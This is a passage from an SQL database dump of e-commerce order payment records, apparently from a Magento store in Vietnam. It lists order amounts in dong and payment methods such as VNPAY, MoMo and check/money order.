QR)\"}'),(51,51,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,9097000.0000,NULL,NULL,NULL,9097000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(52,52,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,5.0000,5.0000,NULL,NULL,7399005.0000,NULL,NULL,NULL,7399005.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(53,53,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,7399000.0000,NULL,NULL,NULL,7399000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(54,54,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,745000.0000,NULL,NULL,NULL,745000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(55,55,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,7399000.0000,NULL,NULL,NULL,7399000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(56,56,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,7399000.0000,NULL,NULL,NULL,7399000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(57,57,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,9097000.0000,NULL,NULL,NULL,9097000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(58,58,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,5.0000,5.0000,NULL,NULL,7198005.0000,NULL,NULL,NULL,7198005.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(59,59,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,9097000.0000,NULL,NULL,NULL,9097000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(60,60,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,7399000.0000,NULL,NULL,NULL,7399000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(61,61,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,7399000.0000,NULL,NULL,NULL,7399000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(62,62,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,7399000.0000,NULL,NULL,NULL,7399000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(63,63,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,6499000.0000,NULL,NULL,NULL,6499000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(64,64,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,7399000.0000,NULL,NULL,NULL,7399000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(65,65,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,7198000.0000,NULL,NULL,NULL,7198000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(66,66,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,7399000.0000,NULL,NULL,NULL,7399000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(67,67,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,7399000.0000,NULL,NULL,NULL,7399000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(68,68,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,6499000.0000,NULL,NULL,NULL,6499000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(69,69,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,9097000.0000,NULL,NULL,NULL,9097000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(70,70,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,6499000.0000,NULL,NULL,NULL,6499000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(71,71,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,7399000.0000,NULL,NULL,NULL,7399000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(72,72,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,7198000.0000,NULL,NULL,NULL,7198000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(73,73,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,7399000.0000,NULL,NULL,NULL,7399000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(74,74,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,6499000.0000,NULL,NULL,NULL,6499000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(75,75,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,7399000.0000,NULL,NULL,NULL,7399000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(76,76,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,7198000.0000,NULL,NULL,NULL,7198000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(77,77,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,6499000.0000,NULL,NULL,NULL,6499000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(78,78,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,9097000.0000,NULL,NULL,NULL,9097000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(79,79,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,7399000.0000,NULL,NULL,NULL,7399000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(80,80,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,7198000.0000,NULL,NULL,NULL,7198000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(81,81,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,9097000.0000,NULL,NULL,NULL,9097000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(82,82,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,7399000.0000,NULL,NULL,NULL,7399000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(83,83,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,6499000.0000,NULL,NULL,NULL,6499000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(84,84,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,7399000.0000,NULL,NULL,NULL,7399000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(85,85,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,6499000.0000,NULL,NULL,NULL,6499000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(86,86,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,7399000.0000,NULL,NULL,NULL,7399000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(87,87,0.0000,0.0000,NULL,9097000.0000,NULL,NULL,NULL,NULL,0.0000,0.0000,9097000.0000,NULL,9097000.0000,NULL,NULL,NULL,9097000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(88,88,0.0000,0.0000,NULL,7399000.0000,NULL,NULL,NULL,NULL,0.0000,0.0000,7399000.0000,NULL,7399000.0000,NULL,NULL,NULL,7399000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(89,89,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,100.0000,NULL,NULL,NULL,100.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(90,90,0.0000,0.0000,NULL,8755000.0000,NULL,NULL,NULL,NULL,0.0000,0.0000,8755000.0000,NULL,8755000.0000,NULL,NULL,NULL,8755000.0000,NULL,NULL,NULL,NULL,NULL,NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(91,91,0.0000,0.0000,NULL,9097000.0000,NULL,NULL,NULL,NULL,0.0000,0.0000,9097000.0000,NULL,9097000.0000,NULL,NULL,NULL,9097000.0000,NULL,NULL,NULL,NULL,NULL,NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(92,92,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,7198000.0000,NULL,NULL,NULL,7198000.0000,NULL,NULL,NULL,NULL,NULL,NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(93,93,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,1294080.0000,NULL,NULL,NULL,1294080.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(94,94,0.0000,0.0000,NULL,101100.0000,NULL,NULL,NULL,NULL,0.0000,0.0000,101100.0000,NULL,101100.0000,NULL,NULL,NULL,101100.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(95,95,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,1930000.0000,NULL,NULL,NULL,1930000.0000,NULL,NULL,NULL,NULL,NULL,NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(96,96,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,1100000.0000,NULL,NULL,NULL,1100000.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(97,97,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,2401125.0000,NULL,NULL,NULL,2401125.0000,NULL,NULL,NULL,NULL,'0',NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(98,98,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,1112100.0000,NULL,NULL,NULL,1112100.0000,NULL,NULL,NULL,NULL,NULL,NULL,'vnpay',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"VNPAY (ATM, Visa, Master,...VNPAY, VNPAY QR)\"}'),(99,99,NULL,NULL,NULL,NULL,NULL,3336300.0000,NULL,NULL,0.0000,0.0000,NULL,3336300.0000,3336300.0000,NULL,NULL,NULL,3336300.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(100,100,NULL,NULL,NULL,NULL,NULL,10211100.0000,NULL,NULL,0.0000,0.0000,NULL,10211100.0000,10211100.0000,NULL,NULL,NULL,10211100.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(101,101,NULL,NULL,NULL,NULL,NULL,12839700.0000,NULL,NULL,0.0000,0.0000,NULL,12839700.0000,12839700.0000,NULL,NULL,NULL,12839700.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(102,102,NULL,NULL,NULL,NULL,NULL,9099000.0000,NULL,NULL,0.0000,0.0000,NULL,9099000.0000,9099000.0000,NULL,NULL,NULL,9099000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(103,103,NULL,NULL,NULL,NULL,NULL,3336300.0000,NULL,NULL,0.0000,0.0000,NULL,3336300.0000,3336300.0000,NULL,NULL,NULL,3336300.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(104,104,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0.0000,0.0000,NULL,NULL,10211100.0000,NULL,NULL,NULL,10211100.0000,NULL,NULL,NULL,NULL,'0',NULL,'checkmo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"S\\u00e9c \\/ L\\u1ec7nh chuy\\u1ec3n ti\\u1ec1n\"}'),(105,105,NULL,NULL,NULL,NULL,NULL,9402300.0000,NULL,NULL,0.0000,0.0000,NULL,9402300.0000,9402300.0000,NULL,NULL,NULL,9402300.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(106,106,NULL,NULL,NULL,NULL,NULL,9099000.0000,NULL,NULL,0.0000,0.0000,NULL,9099000.0000,9099000.0000,NULL,NULL,NULL,9099000.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(107,107,NULL,NULL,NULL,NULL,NULL,7961625.0000,NULL,NULL,0.0000,0.0000,NULL,7961625.0000,7961625.0000,NULL,NULL,NULL,7961625.0000,NULL,NULL,NULL,NULL,'0',NULL,'momo',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,'0',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'{\"method_title\":\"Momo\"}'),(108,108,NULL,NULL,NULL,NULL,NULL,12839700.0000,NULL,NULL,0.0000,0.0000,NULL,12839700.0000,12839700.0000,NULL,NULL,NULL,12839700.0000,N